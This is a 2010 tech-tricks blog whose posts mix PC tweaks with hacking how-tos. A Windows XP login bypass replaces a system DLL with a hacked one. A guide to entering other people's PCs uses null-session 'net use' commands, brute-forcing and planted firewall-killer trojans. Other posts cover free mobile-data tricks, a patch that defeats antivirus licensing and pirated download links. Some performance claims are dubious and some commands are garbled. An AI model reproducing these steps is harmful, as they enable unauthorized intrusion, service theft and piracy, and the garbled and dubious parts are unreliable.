Tuesday, August 31, 2010

how to remove newfolder.exe virus

                    how to remove newfolder.exe virus

Step 1: Use Windows File Search Tool to Find newfolder.exe Path


  1. Go to Start > Search > All Files or Folders.
  2. In the "All or part of the the file name" section, type in "newfolder.exe" file name(s).
  3. To get better results, select "Look in: Local Hard Drives" or "Look in: My Computer" and then click "Search" button.
  4. When Windows finishes your search, hover over the "In Folder" of "newfolder.exe", highlight the file and copy/paste the path into the address bar. Save the file's path on your clipboard because you'll need the file path to delete newfolder.exe in the following manual removal steps.

Step 2: Use Windows Task Manager to Remove newfolder.exe Processes


  1. To open the Windows Task Manager, use the combination of CTRL+ALT+DEL or CTRL+SHIFT+ESC.
  2. Click on the "Image Name" button to search for "newfolder.exe" process by name.
  3. Select the "newfolder.exe" process and click on the "End Process" button to kill it.

Step 3: Detect and Delete Other newfolder.exe Files

  1. To open the Windows Command Prompt, go to Start > Run > cmd and then press the "OK" button.
  2. Type in "dir /A name_of_the_folder" (for example, C:\Spyware-folder), which will display the folder's content even the hidden files.
  3. To change directory, type in "cd name_of_the_folder".
  4. Once you have the file you're looking for type in del "name_of_the_file".
  5. To delete a file in folder, type in "del name_of_the_file".
  6. To delete the entire folder, type in "rmdir /S name_of_the_folder".
  7. Select the "newfolder.exe" process and click on the "End Process" button to kill it.
Download File : -
spyware download SpyHunter's Spyware Scanner.
Download SpyHunter's Spyware Scanner

Oracle PL/SQL Tutorial

                                                       Oracle PL/SQL Tutorial

Download File : -
http://www.java2s.com/Tutorial/Oracle/0040__Query-Select/Catalog0040__Query-Select.htm

Monday, August 30, 2010

Virus Solution

                                 Computer Virus Solution



Download File:-
http://www.techpraveen.com/search/label/Virus%20Solution

MY Technical E-books

                                   MY Technical E-books

Information Technology

                            Information Technology

For Information Technology visit my another web page
http://nishantpotdar.googlepages.com this link may help to increase your knowledge

All keyboard Shortcuts

                            All keyboard Shortcuts

http://nishantpotdar.googlepages.com/allkeyboardshortcuts

Protect your Eyes while using computer

             Protect your Eyes while using computer

http://nishantpotdar.googlepages.com/protectyoureyeswhileusingcomputer%28mustre

Download Marathi songs

                                     Download Marathi songs

Hindi-English Dictionary

                                          Hindi-English Dictionary

eng-hin-2col
eng-hin-2col.pdf
Hosted by eSnips

Restart windows without restarting your PC

       Restart windows without restarting your PC

If u Install An Application And it Ask For Reboot Just Use This And U Can Use Ur Application Without Restart

this works both with windows vista and xp.
so heres the trick..

Vista:
Select Start, then hover over the right arrow that is to the right of
the padlock icon until the pop-up menu appears that contains “restart”
as one of it’s choices. Hold down the SHIFT key while clicking on the
“restart” choice.

Windows XP
Select Start. Select “Shut Down…”. Change the drop-down combo box under “What do you want the computer to do?” to “Restart”. Hold down the SHIFT key while clicking on the “OK” button. 

Reveal *****(Asterisk) Passwords Using Javascript

        Reveal *****(Asterisk) Passwords Using Javascript

Want to Reveal the Passwords Hidden Behind Asterisk (****) ?

Follow the steps given below-

1) Open the Login Page of any website. (eg. http://mail.yahoo.com)

2) Type your 'Username' and 'Password'.

3) Copy and paste the JavaScript code given below into your browser's address bar and press 'Enter'.
javascript: alert(document.getElementById('Passwd').value);


4) As soon as you press 'Enter', A window pops up showing Password typed by you..!


Note :- This trick may not be working with firefox.

Hack Windows XP Password

                     Hack Windows XP Password 

Windows XP. It is easy and it does not reset the password. Hack into a computer running Windows XP without changing the password and find out all and any passwords on the machine (including admin accounts). You do not need access to any accounts to do this. Of course, do not do this on anyone else's computer without proper authorization.




<!--[endif]-->
Steps to Hack into a Windows XP Computer without changing password:
1. Get physical access to the machine. Remember that it must have a CD or DVD drive.
2. Download DreamPackPL HERE.
3. Unzip the downloaded dpl.zip and you’ll get dpl.ISO.
4. Use any burning program that can burn ISO images.
5. After you have the disk, boot from the CD or DVD drive. You will see Windows 2000 Setup and it will load some files.
6. Press “R” to install DreamPackPL.
7. Press “C” to install DreamPackPL by using the recovery console.
8. Select the Windows installation that is currently on the computer (Normally is “1″ if you only have one Windows installed)
9. Backup your original sfcfiles.dll by typing:
“ren C:WindowsSystem32sfcfiles.dll sfcfiles.lld” (without quotes)
10. Copy the hacked file from CD to system32 folder. Type:
“copy D:i386pinball.ex_ C:WindowsSystem32sfcfiles.dll” (without quotes and assuming your CD drive is D <!--[if !vml]-->)<!--[endif]-->
11. Type “exit”, take out disk and reboot.
12. In the password field, type “dreamon” (without quotes) and DreamPack menu will appear.
13. Click the top graphic on the DreamPack menu and you will get a menu popup.
 

 14. Go to commands and enable the options and enable the god command.
<!--[if !vml]--><!--[endif]-->
15. Type “god” in the password field to get in Windows.You can also go to Passwords and select “Logon with wrong password and hash”. This option allows you to login with ANY password.
Note: I was unable to bring up the DreamPackPL for the first time because I have Kaspersky Anti-Virus already running in background. I believe most antivirus already labelled this tool as a Hack-Tool. A Hack-Tool is NOT a virus. DreamPackPL helps you bypass the Windows Login screen and it is not destructive



What is Hacker & Hacking?

                         What is Hacker & Hacking?





















Hacker, as it relates to computers, has several common meanings. Hacker is often used by the mass media to refer to a person who engages in computer cracking and is also often by those in computing fields to refer to a person who is a computer enthusiast. At least three major hacker subcultures, characterized by their largely distinct historical development, use the term in their jargon for self-identification.[1] They are centered around different, but partially overlapping aspects of computers and have conflicting ideas about who may legitimately be called a hacker (see hacker definition controversy). In computer security, a hacker is someone who focuses on security mechanisms. In common use, which was popularized by the mass media, that refers to someone who illegally breaks into computer and network systems. However, parts of the subculture see their aim in correcting security problems and use the word in a positive sense. This use is contrasted by the different understanding of the word as a person who follows a spirit of playful cleverness and loves programming. It is found in an originally academic movement unrelated to computer security and most visibly associated with free software and open source. In a third meaning, the term refers to computer hobbyists who push the limits of their software or hardware.
Computer security hackersMain article: Hacker (computer security)In computer security, a hacker is a person who specializes in work with the security mechanisms for computer and network systems. The subculture around such hackers is termed network hacker subculture, hacker scene or computer underground. While including those who endeavor to strengthen such mechanisms, it is more often used by the mass media and popular culture to refer to those who seek access despite these security measures. Accordingly, the term bears strong connotations that may be favorable or pejorative.
The network hacker subculture initially developed by callum context of phreaking during the 1960s and the microcomputer BBS scene of the 1980s. It is implicated with 2600: The Hacker Quarterly and the alt.2600 newsgroup.
By 1983, hacking in the sense of breaking computer security had already been in use as computer jargon,[2] but there was no public awareness about such activities.[3] However, the release of the movie WarGames that year raised the public belief that computer security hackers (especially teenagers) could be a threat to national security. This concern became real when a gang of teenage hackers in Milwaukee, Wisconsin known as The 414s broke into computer systems throughout the United States and Canada, including those of Los Alamos National Laboratory, Sloan-Kettering Cancer Center and Security Pacific Bank. The case quickly grew media attention[4][5], and 17-year-old Neal Patrick emerged as the spokesman for the gang, including a cover story in Newsweek entitled "Beware: Hackers at play", with Patrick's photograph on the cover. [6] The Newsweek article appears to be the first use of the word hacker by the mainstream media in the pejorative sense.
As a result of news coverage, congressman Dan Glickman called for an investigation and new laws about computer hacking. [7] Neal Patrick testified before the U.S. House of Representatives on September 26, 1983 about the dangers of computer hacking, and six bills concerning computer crime were introduced in the House that year. [8] As a result of these laws against computer criminality, white hat, grey hat and black hat hackers try to distinguish themselves from each other, depending on the legality of their activities.
Computer pioneer Ken Thompson reflected on the above events during his 1983 Turing Award lecture. Thompson noted that it is possible to add code to the UNIX "login" command that would accept either the intended encrypted password or a particular known password, allowing a back door into the system with the latter password. He named his invention the "Trojan horse." Furthermore, Thompson argued, the C compiler itself could be modified to automatically generate the rogue code, to make detecting the modification even harder. Because the compiler is itself a program generated from a compiler, the Trojan horse could also be automatically installed in a new compiler program, without any detectable modification to the source of the new compiler. Yet Thompson also chastised the press in his lecture: "I would like to criticize the press in its handling of the 'hackers,' the 414 gang, the Dalton gang, etc. The acts performed by these kids are vandalism at best and probably trespass and theft at worst. ... I have watched kids testifying before Congress. It is clear that they are completely unaware of the seriousness of their acts." [9]
Hobby HackersMain article: Hacker (hobbyist)The hobby hacking subculture relates to hobbyist home computing of the late 1970s, beginning with the availability of MITS Altair. An influential organization was the Homebrew Computer Club.
The parts that didn't fuse with the academic hacker subculture focus mainly on commercial computer and video games, software cracking and exceptional computer programming (demo scene), but also to the modification of computer hardware and other electronic devices, see modding.
Hack has several meanings in the technology and computer science fields: a clever or quick fix to a computer program problem; a clumsy or inelegant solution to a problem; illegally breaking into a computer, generally over a network connection; or a modification of a program or device to give the user access to features otherwise were unavailable to them.
History in Computer ScienceA "hack" now meant a clever or quick fix to a computer program problem, as in "That hack you made last night to the editor is working well". A hacker came into the lexicon as meaning one who hacks, using this definition. The surface implication (which might be a modest mocking and play on the literary definition) was a casual attempt to fix the problem, but the deeper meaning was something more clever and thus impressive.
It was used especially among US university computing center staff, such as those at Stanford in the period beginning approximately in the mid-1960s. The context determined whether the complimentary or derogatory meanings were implied. Phrases such as "ugly hack" or "quick hack" generally referred to the latter meaning; phrases such as "cool hack" or "neat hack" referred to the former.
In modern computer programming, a "hack" can refer to a solution or method which functions correctly but which is "ugly" in its concept, which works outside the accepted structures and norms of the environment, or which is not easily extendable or maintainable (see kludge).
In a similar vein, a "hack" may refer to works outside of computer programming. For example, a math hack means a clever solution to a mathematical problem. The GNU General Public License has been described as a copyright hack because it cleverly uses the copyright laws for a purpose the lawmakers did not foresee. All of these uses now also seem to be spreading beyond MIT as well.
The term has since acquired an additional and now more common meaning, since approximately the 1980s; this more modern definition was initially associated with crackers. This growing use of the term "hack" is to refer to a program that (sometimes illegally) modifies another program, often a computer game, giving the user access to features otherwise inaccessible to them. As an example of this use, for Palm OS users (until the 4th iteration of this operating system), a "hack" refers to an extension of the operating system which provides additional functionality. The general media also uses this term to describe the act of illegally breaking into a computer, but this meaning is disputed. The term is additionally used to refer to attempts to gain low-level access to hardware such as a graphing calculator, video game console, or other device (see CueCat for a notorious example) to expose or add functionality to a device that was unintended for use by end users by the company who created it. While it is generally accepted as a way of creating additional markets for such devices (and software as well), companies take different and sometimes inconsistent attitudes towards such practices, ranging from open acceptance (such as Texas Instruments for its graphing calculators and Lego for its Lego Mindstorms robotics gear) to outright hostility (such as Microsoft's attempts to lock out Xbox hackers or the DRM routines on Blu-Ray players designed to sabotage compromised players). Such activity is generally considered to exist in a legal gray area.
Sometimes the jargon used by hackers is thought of as a language in its own right, called hackish (see the Jargon file). This should not be confused with "1337" or "leetspeak."

Multiple Instances of Google Talk

                                        Multiple Instances of Google Talk


Users of Google Talk (GTalk) can also let GTalk go to polygamy, that’s running multiple instances of Google Talk and login to multiple Google accounts on Google Talk. The polygamy trick can be done without any crack, patch or hack, with just a simple command line parameter or switch /nomutex appended to the Google Talk shortcut.

Ability to polygamy running multiple Google Talk is useful if users have multiple Google Talk accounts (or Google or Gmail accounts that used to login to GTalk) or multiple profiles or personalities, and don’t want to log on and off from one account to another account every time when want to switch, or want to log in to all accounts at the same time on the same computer.

You can add the /nomutex switch or parameter to existing Google Talk shortcut, or create a new shortcut with the /nomutex command line parameter.

To edit existing Google Talk shortcut:

1) Right click on the Google Talk shortcut.
2) On the right click contextual menu, click on Properties.
3) Go to Shortcut tab on Google Talk Properties window.
4) On the Target textbox, add in the /nomutex to the end of the line so that it looks like below (or you can simply copy and paste the below syntax and replace the original).

Target: "C:\Program Files\Google\Google Talk\googletalk.exe" /nomutex

5) Click on OK.


To create a new shortcut for Google Talk:

1) Right-click on the desktop or anywhere you want to place the GTalk shortcut.
2) Select New on the right click context menu.
3) Then select Shortcut.
4) Copy and paste the following line to the text box when prompted to type the location of the item:

“C:\Program Files\Google\Google Talk\googletalk.exe” /nomutex

5) Click on Next.
6) Give the shortcut a proper name such as Google Talk or Google Talk Multiple or Google Talk Polygamy.
7) Click OK until you are done.

If you have hex editor, you can act like a hacker and modify the bits in Google Talk program so that it will always allow multiple instances of GTalk to be launched whether the /nomutex switch is specified or not.

Launch hex editor and open googletalk.exe, then search for the following patterns in the hex editor:

004536FD . 3BC6 CMP EAX,ESI
004536FF . 75 05 JNZ SHORT googleta.00453706

Modify the string to look like the following:

004536FD . 8BC1 MOV EAX,ECX
004536FF . EB 05 JMP SHORT googleta.00453706


How this Works?
The mutex is short for mutual exclusion object.
A mutex is a program object that allows multiple program threads to share the same resource, but not simultaneously.

So, in the hack above, we used nomutex (no-mutex) to use the same resources simultaneously....!


(OR)
ALTERNATIVE METHOD (BOTH ARE WORKING)

Just follow the simple steps Below:

1)Right click on the Google Talk shortcut.

2)click on Properties.

3)Go to Shortcut tab on Google Talk Properties window.

4)On the Target textbox, add in the /nomutex to the end of the line so that it looks like below (or you can simply copy and paste the below syntax and replace the original).
“c:\program files\google\google talk\googletalk.exe” /nomutex

5)Click on OK.

I didn't have to do anything after this nd clicking on the shortcut multiple times just gave me different google talk window.

Alternative


To create a new shortcut for Google Talk:

1)Right-click on the desktop or anywhere you want to place the GTalk shortcut.

2)Select New on the right click context menu.

3)Then select Shortcut.

4)Copy and paste the following line to the text box when prompted to type the location of the item:
“c:\program files\google\google talk\googletalk.exe” /nomutex

5)Click on Next.

6)Give the shortcut a proper name such as Google Talk or Google
Talk Multiple or Google Talk Polygamy.

8)Click OK until you are done.

Trick To Make Your Firefox Fast

                  Trick To Make Your Firefox Fast

This tricks will improve the speed & load time of firefox. And you will be able to surf faster.

Type about:config in the address bar, Then look for the following entries, and make the corresponding changes.

1. network.http.max-connections-per-server =32

2. network.http.max-persistent-connections-per-proxy =16

3. network.http.max-connections = 64

4. network.http.max-persistent-connections-per-server = 10

5. network.http.pipelining = true

6. network.http.pipelining.maxrequests = 200

7. network.http.request.max-start-delay = 0

8. network.http.proxy.pipelining = true

9. network.http.proxy.version = 1.0

Lastly right-click anywhere and select New- Integer.

Name it nglayout.initialpaint.delay and set its value to 0. This value is the amount of time the browser waits before it acts on information it recieves.Enjoy!!

Increase your RAM and so system speed

          Increase your RAM and so system speed

1). Start any application, say Word. Open some large documents.

2). Press CTRL+SHIFT+ESC to open Windows Task Manager and click Processes tab and sort the list in descending order on Mem Usage. You will notice that WINWORD.EXE will be somewhere at the top, using multiple MBs of memory.

3). Now switch to Word and simply minimize it. (Don't use the Minimize All Windows option of the task bar).

4). Now go back to the Windows Task Manager and see where WINWORD.EXE is listed. Most probably you will not find it at the top. You will typically have to scroll to the bottom of the list to find Word. Now check out the amount of RAM it is using. Surprised? The memory utilization has reduced by a huge amount.

5). Minimize each application that you are currently not working on by clicking on the Minimize button & you can increase the amount of available RAM by a substantial margin. Depending upon the number and type of applications you use together, the difference can be as much as 50 percent of extra RAM.

In any multitasking system, minimizing an application means that it won't be utilized by the user right now. Therefore, the OS automatically makes the application use virtual memory & keeps bare minimum amounts of the code in physical RAM.

Increase Virtual RAM - To Make Your System Faster

   Increase Virtual RAM - To Make Your System Faster

Follow the steps given below :-


1) Hold down the 'Windows' Key and Press the 'Pause/Break' button at the top right of your keyboard.
Another way is Right-Clicking 'My Computer' and then Select 'Properties'.

2) Click on the 'Advanced' tab.

3) Under 'Performance', click 'Settings'.

4) Then click the 'Advanced' tab on the button that pops up.

5) Under 'Virtual Memory' at the bottom, click 'Change'.

6) Click the 'Custom Size' button.

7) For the initial size (depending on your HD space), type in anywhere from 1000-1500 (although I use 4000), and for the Maximum size type in anywhere from 2000-2500 (although I use 6000).

8) Click 'Set', and then exit out of all of the windows.

9) Finally, Restart your computer.

10) You now have a faster computer and 1-2GB of Virtual RAM..!

Increase Broadband Speed Using Simple Tweak

       Increase Broadband Speed Using Simple Tweak

Increase Broadband Speed Using Simple Tweak
A Simple Tweak (XP Pro only) which will increase your Broadband Speed.

Make sure you Log on as Administrator, not as a user with Administrator privileges.

Follow the steps as given below-

1) Click on Start Button.

2) Select Run From Start Menu.

3) Type gpedit.msc

4) Expand the [Administrative Templates] branch.

5) Then Expand the [Network] branch.

6) Highlight(Select by Single Click) [QoS Packet Scheduler]

7) Double-click [Limit Reservable Bandwidth] (Available in Right Side Panel)

8) Check(Select By Single Click on it) [Enabled]

9) Change [Bandwidth limit %] to 0 %

10) Click [OK] Button.

11) Restart Your PC.

12) Now Check Your Broadband Speed.

lock your folders without the use of any additional software

      lock your folders without the use of any additional software

Procedure :
1. Make a folder on the desktop and name it as "folder"
2. Now, open notepad and write ren folder folder.{21EC2020-3AEA-1069-A2DD-08002B30309D} and now (Notepad Menu) File>save as.
3. In the 'save as' name it as lock.bat and click save ! (Save it on Desktop)
4. Now, again open notepad again and write ren folder.{21EC2020-3AEA-1069-A2DD-08002B30309D} folder and now (Notepad Menu) File>save as.
5. In the 'save as' name it as key.bat and click save ! (Save it on Desktop)
6. Now, double click lock.bat to lock the folder and now if you open your folder, control panel will open up !
7. Now, double click key.bat to open the folder and now if you open your folder, you can access your data inside the folder again !
8. Lock your folder and hide the key.bat somewhere else on your hard disk !
9. Whenever you want to open your folder just paste the key.bat on desktop and open your folder using it !

HOW TO HACK AOL®, YAHOO® AND HOTMAIL®

        HOW TO HACK AOL®, YAHOO® AND HOTMAIL®






 






We get numerous calls from people who want to recover AOL®, Yahoo® or Hotmail® or other online and email passwords. We do not do this type of work. Many of these people claim that they have lost their passwords because they have been hacked and now need to get their password back. As we have reviewed information on the web, we found very little real information about the actual techniques that could be used to hack these services. So we decided to pull together a detailed explanation.
What follows is a detailed explanation of the methodologies involved. We do not condone any illegal activity and we clearly mention in this article techniques that are illegal. Sometimes these methods are known as “Phishing.”
THE HOAX
Let’s dispose of one technique that is absolutely a hoax (meaning a fraud: something intended to deceive; deliberate trickery intended to gain an advantage.) If you see a newsgroup post or web page with something like the following, it is a hoax and will not work.
: : : (([[THIS REALLY WORKS ]])) : : :
(1) send an E-mail to passwordrecovery@yourdomainhere.com
(2) In the subject box type the screenname of the person whose password you wish to steal
(3) In the message box type the following: /cgi-bin/start?v703&login.USER=passmachine&class=supervisor&f={your aol password}&f=27586&javascript=ACTIVE&rsa
(4) Send the e-mail with priority set to “high” (red ! in some mailprograms)
(5) wait 2-3 minutes and check your mail
(6) Read the message.-Where YOUR password was typed before, NOW, the password of the screenname in the code string is there!!!
Why does this work? It´s a special decryption-server that AOL-employees can use to decrypt passwords.The aolbackdoor account is a bot that reads your authentification from the message body and identifiying you as a valid AOL Staff-member, you will get the password mailed back to you. The trick is that this Bot´s script seems to be a little bit buggy and it automatically recogises you as an supervisor (AOL-Staff member), even if you use a normal AOL account. This means, that EVERYONE having a valid AOL account can hack as many other accounts as he wants.
This is just a scam to steal your password and may explain some of the calls we get from people saying they were hacked. Never give your password to anyone. No legitimate web service or customer service representative will ask for it or need it. There is no magic email address or series of commands that will reveal the passwords of users.
LOCALLY STORED PASSWORDS
Most browsers, including Internet Explorer® and Netscape®, the AOL® client, and Windows® Dial-Up Connections allow you the option to store passwords. These passwords are stored on the local machine and (depending upon where and how it is stored) there is usually a method of recovering these passwords. Storing any password locally is insecure and may allow the password to be recovered by anyone who has access to the local machine. While we are not currently aware of any program to recover locally stored AOL® passwords, we do not recommend that these are secure. Software does exist that can recover most of the other types of locally stored passwords.
TROJAN
A Trojan is a program that is sent to a user that allows an attacker to control functions of the target computer, recover information from the target or to delete or damage files on the target. The name Trojan is given because the program will usually come attached to some other program or file that entices you to run it. There are a wide variety of Trojans any number of which can be programmed to capture passwords as they are typed and to email or transmit them to a third party. To protect yourself against Trojans, you should never execute or download software or files that are not from a trusted source. It is critical that anyone working on internet use a virus protection program (which should catch most Trojans.) Note that since a Trojan requires the password to be typed or stored in order to be recovered, this is not an effective way to recover your own password. It could explain, however, how someone could lose their password to a hacker. Sending someone a Trojan program is certainly illegal and we do not recommend or condone this activity. A Trojan is unlikely to be effective in recovering a particular account password since it requires the target to install it. However, hackers will often bulk mail Trojans to thousands of people in the hope that a small percentage will get caught. Legitimate account holders who may have been caught by a Trojan and can authenticate themselves should contact their service provider to have their account passwords reset.
KEYLOGGER
A keylogger is a program or piece of hardware that records all keyboard keystrokes to an encrypted file which can then be read later. Based on the order of the keystrokes, it is usually easy to identify the password(s) from the file later. Like the Trojan, this also requires that someone actually type the password. Keyloggers come in two types: hardware and software. A hardware keylogger can be fitted between the keyboard cable and the computer and can be activated with a few keystrokes. It is then left in place until after the password that you are looking to recover is typed. Later it is removed and the file of keystrokes is examined for the password. A hardware keylogger is undectable by anti-virus software. A software keylogger is installed on a system and effectively has the same function, however, it is a little bit more complex to use since it must be installed to run stealthily to be effective. A keylogger could be used to steal a password from someone who is using an office computer or sharing a computer. It is possible that installing and using such a device or piece of software could be illegal depending upon whether the target has a presumption of privacy when using the computer on which the keylogger is installed.
IMPERSONATIONIt is possible to impersonate a program on a computer by launching windows that look like something else. For instance, let’s say you login to the MSN® service and visit a website (in this case a hostile website.) It would be possible for this website to pop-up some windows that look like something else. They could look almost identical to windows that an inexperienced user might expect from his local computer. The user could be fooled into submitting information to the hostile website. For instance, consider the effect of seeing the following series of windows:
If these could trick you into entering your password, then you could end-up sending your password to the attacker. Windows such as these could be created to mirror virtually any program or series of actions. Your browser will likely identify your operating system and your IP address might identify your ISP. Therefore, a hostile website could target you with a series of screen shots that look exactly as they should on your system. The key is that the screen shots are not coming from your system, but are coming from the hostile website. First, creating such a hostile website is probably fraudulent and illegal. We do not recommend or condone this activity. To protect yourself against this type of attack, make sure to configure your browser for high security and enable warnings for any code that is executed on your system.
SNIFFINGIf two people do not share the same computer, but do share the same network, it may be possible for one to sniff the others’ packets as they sign-on. The traffic between your computer and the internet site you are accessing may be able to be recorded and decrypted or “played-back.” This is not a simple attack to execute, but is possible if two people are close to one another and share a hub. Again, this is likely to be illegal and we do not condone this activity.
BRUTE-FORCE ATTACKMany people want to find software to perform a brute-force attack. This is really impractical. It would take hundreds of thousands of years to attempt any kind of reasonable brute-force attack on AOL®, Yahoo® or Hotmail® and this would expand exponentially if the password is longer than the minimum length. Using multiple computers or multiple sessions could reduce this to merely thousands of years. This is highly illegal since these services own the servers on which an account is hosted. Even if you are hacking your own account, you don’t own the servers and the service is going to monitor and log this activity. It is extremely unlikely that you could recover a password in this way, but it is extremely likely that you’d be arrested and prosecuted for doing this.
SOCIAL ENGINEERING
Social engineering is the name given to the art of attacking the person, rather than the computer or system. The basic principle is that many people can be talked into giving someone else their id and password if they think it is someone that they can trust. For instance, I might call someone and say I was from AOL and that I was finally getting around to responding to their technical support question. I would then ask you to describe the problem that you are having and tell you that we have a solution. However, I just need to verify the account. Can you give me the username and password again? A surprising number of people would fall for this obvious scam. There is no limit as to how elaborate this can be. The more information that is given by the caller, the more realistic or believable the call is. Again, never give your password to anyone. No legitimate customer service representative will ask for this information.
These are the basic methods that we are aware of for hacking an AOL®, Yahoo®, Hotmail® or any other dial-up or on-line password. Hopefully this will answer some questions and help you protect yourself against these attacks

Vodafone Hack For Free GPRS

                     Vodafone Hack For Free GPRS

This method has been tested on different mobiles and has been confirmed to be working.
Followng are the Settings you require to configure on your Mobile:

Account Name: Vodafone_gprs
Homepage: http://live.vodafone.in
User Name: (no need)
Pass: (no need)

Access Point Settings:-
Proxy: Enabled
Proxy Address: 10.10.1.100
Proxy Port: 9401
Data Bearer: Packet Data

Bearer Settings:-
Packet Data Access Point: portalnmms
Network type: IPV4
Authentication: normal
User Name: (no need)
Password: (no need)

*IF that happen this settings is not working then change the proxy port number to:-

Proxy Port: 9401

Enter InTo Anothers PC And Share Data

              Enter InTo Anothers PC And Share Data

If your Public IP(shown on tracemyip.com) is 169.xxx.xxx.xxx,then if you use this in the nbtstat command then you will get the statement "Host not found"


If your private IP(actual IP) is 69.xxx.xxx.xxx then you can use this in nbtstat command

Usage:

nbtstat -A 69.xxx.xxx.xxx


Now you will get the result as below:

NetBIOS Remote Machine Name Table

Name Type Status
--------------------------------------------
BXCGGDKHSVVCHG6<00> UNIQUE Registered
MSHOME <00> GROUP Registered
MSHOME <1e> GROUP Registered
MSHOME <1d> UNIQUE Registered
..__MSBROWSE__.<01> GROUP Registered

MAC Address = 00-00-6C-9E-CE-5D


Now this pc doesnt have sharing enabled

If the pc has sharing enabled,the the result would be as below:

NetBIOS Remote Machine Name Table

Name Type Status
---------------------------------------------
BXCGGDKHSVVCHG6<00> UNIQUE Registered
BXCGGDKHSVVCHG6<20> UNIQUE Registered
MSHOME <00> GROUP Registered
MSHOME <1e> GROUP Registered
MSHOME <1d> UNIQUE Registered
..__MSBROWSE__.<01> GROUP Registered

MAC Address = 00-00-6C-9E-CE-5D


Now this is a pc with file and printer sharing enabled ..Look at hex code <20>..this means that the file and printer sharing is enabled on that pc! Good sign!


Now make a scan within you Private IP range..if you find any alive hosts,note the ips and use them in the nbtstat command..

If you find sharing enabled on those pcs then use these commands:
To enter a target pc with sharing enabled,just follow these steps mentioned below:

Run cmd
type:
net use k: \\xxx.xxx.xxx.xxx\SharedDocs (Put the ip of the target pc which is in ur network)

now it will show "The command completed successfully!"

Now open My computer,find the drive named K:\ and the open it..this is the shareddocuments folder of the target pc.....enjoy browsing,copying stuff and uploading files,etc

If you are not happy with the sharedDocuments,and wanna hack into the root drive of the target system,then follow these simple steps mentioned below:

run cmd
type:
net use \\xxx.xxx.xxx.xxx\IPC$ "" /u:"" to establish a null session!

now to finally get into the root of the target pc,type:
net use m: \\xxx.xxx.xxx.xxx\C$ "" /u:""

Now it will prompt you to provide username and password..try guessing or bruteforcing..finally when you get the username and password,use those to enter into the system..thats it!!

Sounds simple!! isnt it??

yeah..but if there is a firewall problem then bypass/disable that firewall using the software mentioned by me with procedure in my first few queries..The software is Firekill Firewallkiller 2000.Its a CLI based software...try using this or leave simple firewall killer trojans in the shared documents folder and wait for the target to execute them!!

Sunday, August 29, 2010

Access Free Airtel GPRS Using TeaShark Browser

Access Free Airtel GPRS Using TeaShark Browser

TeaShark, a mobile browser like Opera Mini, allow you to access Airtel GPRS for FREE.
Shockingly it has nothing to do with modifying any Airtel settings or any kind of hack.

Here is how I used this…

* Download TeaShark v. 312. Its free and being JAR file it can be installed on most handsets.
* Open it from your mobile and select AirTel Live as access point.
* That’s it! Open any site from TeaShark and you won’t be charged anything.

Note for the first time, when TeaShark starts, it may take more than one minute to initialize. Also this one time initialization may fail many times. But don’t loose your heart!

As of now, this trick is limited to handsets only.

Note:“Subscribe to Packet Data First”
This means you need to activate AirTel Live service which is free.
Contact customer care to get it activated.
Also select only AirTel Live as access point when prompted by TeaShark.

Download TeaShark: 


Increase your Net speed manually no need of Any software !!!

  Increase your Net speed manually no need of Any software !!!

First, u need to goto
Start, then run.
Type in regedit in the box.
Next, goto the
folder HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\VxD\MSTCP
Now, find the string Default Rcv Window.
Now, edit the number to 64240 (was 65535).
Reboot your Computer and now you have Increase your Net Speed

latest antivirus collections with keys

                   latest antivirus collections with keys

Click this bar to view the full image.F-Secure Internet Security 2009 provides a complete and easy-to-use protection against all Internet threats, whether they are known or previously unidentified. This protection software includes an award-winning antivirus, an easy-to-use personal firewall, an improved antispyware and a new technology, F-Secure DeepGuard 2.0, that constantly monitors the very heart of your computer, ensuring that no malicious programs can take over your computer even if you do not have all the latest updates. In addition, the product filters unwanted spam and so-called phishing attempts from your eMail, and with the parental control, you can block access to websites with questionable content.Fastest protection in the online world! Within the last few years, ever more evidence has shown that online attacks are now being used for financial reward. The professional, money-driven criminals want to stay unnoticed, and they are using very advanced technologies to hide themselves from data security solutions and exploiting even the smallest time window they have before a general recognition for their attack is available.F-Secure Internet Security 2009 comes with F-Secure DeepGuard? 2.0, introducing network-based instant recognition of both safe and malicious software, which is able to protect you in 60 seconds from the first confirmation of a new threat. No other antivirus vendor has such ?in-the-cloud? real-time protection network deployed globally.The first real-time protection network for consumers! F-Secure Protection Datacenters are distributed worldwide and each data center is clustered. These services are so powerful, it only takes milliseconds to query the server for the status of a file. In fact, it is often faster to check the status of a file with a network lookup instead of scanning the file locally with traditional scanning engines.When a new potential threat appears, the first computers that encounter it anywhere in the world, will instantly inform the highly automated F-Secure security labs. For confirmed threats we are able to add complete protection in 60 seconds. After this, all computers with this technology query the network, and are instantly protected. This shortcuts the hours it typically takes to send out database updates.Key features:? Quicker where it mattersNEW! Quick and easy installation, faster boot-up times and faster scanning and cleaning of files.? Protects your computer against viruses, worms and unknown attacksWith automatically updated virus protection from the world-renowned F-Secure Data Security Laboratory and the new F-Secure DeepGuard 2.0 technology that instantly protects you against zero-day attacks and other future threats, you can safely use your computer, now and tomorrow.? Detects and removes spyware from your computerF-Secure Internet Security detects and removes secretly installed software from your computer better than ever before, ensuring that your system is running smoothly and clean of spyware.? Protects your computer against hackersYou can keep your private data to yourself with the personal firewall that stops hackers from breaking into your computer.? Helps you stay free from spam e-mail and phishing attemptsF-Secure Internet Security filters unwanted spam and e-mail schemes designed to steal your private information.? Protects your children against unwanted Internet contentF-Secure Internet Security ensures that your children or teenagers do not enter objectionable sites or surf the Internet when you are not around.Platforms:- Windows Vista (32-bit and 64-bit editions)- Windows XP Home Edition- Windows XP Professional- Windows XP Media Center Edition- Windows 2000 (Workstation only)Languages: English, French, Canadian French, Italian, Swedish, Norwegian, Danish, Finnish, Estonian, Spanish, Mexican Spanish, Dutch, Polish, Hungarian, Czech, German, Greek, Portuguese, Turkish, Slovenian, Japanese, Romanian, Russian, Traditional Chinese (Hong Kong), Traditional Chinese (Taiwan), Simplified Chinese.

Download File:-
http://rapidshare.com/files/264563302/F-SecureInternetSecurity_2009900Build148.zip

      Kaspersky Internet Security and Anti-Virus With Patch 

(no serial Required)No need to update your blacklisted keys any longer!!!! This patch PERMANENTLY patches your Kaspersky software, allowing you to have the latest software, fully licensed without the worry of being blacklisted.With this patch, you can download updates from Kaspersky, and be updated every second with the latest anti-virus and firewall technology. Visit Kaspersky's homepage for more info:

Download File : -
http://www.kaspersky.com/kaspersky_internet_security

Kaspersky Anti-Virus

Download File : -
http://rapidshare.com/files/264887414/kaspersky_2010.zippatch

Download File : -
http://rapidshare.com/files/264889381/Kaspersky_Patch.zip

